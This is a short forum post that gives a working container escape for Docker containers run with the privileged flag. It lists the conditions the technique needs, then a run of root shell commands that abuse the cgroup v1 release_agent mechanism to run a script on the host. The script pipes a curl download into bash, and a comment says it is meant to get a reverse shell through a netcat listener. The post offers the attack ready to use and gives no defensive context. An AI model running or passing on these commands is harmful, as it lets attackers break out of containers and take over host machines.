Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Escaping a Docker container that run --priviliged flag.
Requirements to use this technique, the container must run with the --privliged flag. You must be running as root inside the container. The container must be run with the SYS_ADMIN Linux capability. The container must lack an AppArmor profile or otherwise allow the mount syscall. The cgroup v1 virtual filesystem must be mounted read-write inside the container.

root@container:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@container:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@container:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@container:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl | bash' >/c; #Curl for a reverse shell with netcat listening
root@container:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

just some guy

Messages In This Thread
Escaping a Docker container that run --priviliged flag. - by 0xgh64 - 07-01-2022, 03:53 PM

Forum Jump:

Users browsing this thread: 1 Guest(s)